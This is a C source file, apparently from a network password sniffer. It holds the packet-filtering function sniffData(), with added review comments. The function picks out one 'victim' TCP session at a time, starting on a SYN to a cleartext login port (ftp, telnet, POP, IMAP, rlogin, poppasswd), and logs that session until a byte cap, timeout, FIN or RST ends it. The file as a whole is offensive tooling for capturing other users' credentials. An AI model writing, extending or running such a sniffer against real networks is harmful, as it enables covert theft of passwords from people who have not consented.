#include "sniff.h"

/* Current packet headers and capture state, defined in other translation units. */
extern struct iphdr *ip;
extern struct tcphdr *tcp;
extern struct victim vittima;
extern FILE *fp;

/*
 * sniffData - classify the packet currently referenced by the globals
 * `ip` and `tcp` against the single connection recorded in `vittima`.
 *
 * Steps, in order:
 *   1. Reject anything whose IP protocol field is not 6 (TCP).
 *   2. If a connection is being tracked, stop tracking it once
 *      bytes_read exceeds CAPTLEN or once TIMEOUT has elapsed since
 *      start_time; a marker line is written to `fp` in either case.
 *   3. If nothing is tracked and the packet is a SYN to one of the
 *      listed destination ports, record its addresses and ports as the
 *      tracked connection and call printHeader().
 *   4. Reject packets whose address/port 4-tuple differs from the
 *      recorded one.
 *   5. On RST or FIN, write a marker to `fp`, cancel any pending alarm
 *      and reset the record.
 *
 * Returns 1 when the packet belongs to the tracked connection and does
 * not end it, 0 in every other case.
 *
 * NOTE(review): `ip` and `tcp` are dereferenced without any NULL or
 * length check in this function; presumably the caller has already
 * verified that the captured frame holds complete IP and TCP headers -
 * confirm.
 */
int sniffData(void)
{
    int watched_port = 0;

    /* 6 is the IP protocol number for TCP. */
    if (ip->protocol != 6) {
        return 0;
    }

    if (vittima.active) {
        /* Per-connection cap on recorded bytes (the log text says CAPLEN). */
        if (vittima.bytes_read > CAPTLEN) {
            fprintf(fp, "\n.......... {CAPLEN Exceeded}\n");
            azzeraVittima();
            return 0;
        }

        /* TIMEOUT is added to a time() value, so presumably seconds. */
        if (time(NULL) > (vittima.start_time + TIMEOUT)) {
            fprintf(fp, "\n.......... {Timed Out}\n");
            azzeraVittima();
            return 0;
        }
    }

    /* Destination ports of interest, compared in host byte order. */
    switch (ntohs(tcp->dest)) {
    case 21:    /* ftp */
    case 23:    /* telnet */
    case 110:   /* pop3 */
    case 109:   /* pop2 */
    case 143:   /* imap2 */
    case 513:   /* rlogin */
    case 106:   /* poppasswd */
        watched_port = 1;
        break;
    default:
        break;
    }

    /* Only a SYN to a listed port starts tracking, and only when idle. */
    if (!vittima.active && watched_port == 1 && tcp->syn == 1) {
        vittima.active = 1;
        vittima.saddr = ip->saddr;
        vittima.daddr = ip->daddr;
        /* Ports are stored exactly as they appear in the header (network order). */
        vittima.sport = tcp->source;
        vittima.dport = tcp->dest;
        vittima.bytes_read = 0;
        vittima.start_time = time(NULL);
        printHeader();
    }

    /*
     * Keep only packets travelling in the direction of the recorded SYN.
     * NOTE(review): when nothing is tracked these comparisons run against
     * whatever azzeraVittima() left in vittima (not visible here), so a
     * packet could in principle match an idle record - confirm the reset
     * values.
     */
    if (tcp->dest != vittima.dport ||
        tcp->source != vittima.sport ||
        ip->saddr != vittima.saddr ||
        ip->daddr != vittima.daddr) {
        return 0;
    }

    /* Connection teardown: RST takes precedence over FIN in the log. */
    if (tcp->rst == 1 || tcp->fin == 1) {
        vittima.active = 0;
        alarm(0);   /* cancel any pending SIGALRM */
        if (tcp->rst == 1) {
            fprintf(fp, "\n.......... {RST}\n");
        } else {
            fprintf(fp, "\n.......... {FIN}\n");
        }
        azzeraVittima();
        return 0;
    }

    return 1;
}